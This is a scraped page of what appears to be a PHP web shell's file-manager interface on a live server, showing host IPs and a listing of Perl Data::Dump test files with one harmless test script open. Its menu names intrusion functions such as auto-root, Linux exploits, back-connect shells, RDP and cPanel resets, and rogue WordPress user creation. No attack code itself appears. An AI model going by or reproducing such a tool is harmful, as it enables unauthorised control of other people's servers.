Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.226.186.109
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Data-Dump-1.22 /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
dd.t
143
B
-rw-r--r--
dollar-one.t
299
B
-rw-r--r--
dump.t
2.1
KB
-rw-r--r--
eval.t
336
B
-rw-r--r--
filtered.t
1.7
KB
-rw-r--r--
glob.t
717
B
-rw-r--r--
hash.t
844
B
-rw-r--r--
quote-unicode.t
1.53
KB
-rw-r--r--
quote.t
2.05
KB
-rw-r--r--
ref.t
368
B
-rw-r--r--
regexp.t
553
B
-rw-r--r--
scalar-obj.t
421
B
-rw-r--r--
scalar.t
549
B
-rw-r--r--
tied.t
972
B
-rw-r--r--
vstring.t
510
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eval.t
print "1..1\n"; use Data::Dump qw(dump); # Create some structure; $h = {af=>15, bf=>bless [1,2], "Foo"}; $h->{cf} = \$h->{af}; #$h->{bf}[2] = \$h; @s = eval($dump_h = dump($h, $h, \$h, \$h->{af})); $dump_s = dump(@s); print "not " unless $dump_h eq $dump_s; print "ok 1\n"; print "\n\$h = $dump_h;\n"; print "\n\$s = $dump_s;\n";
Close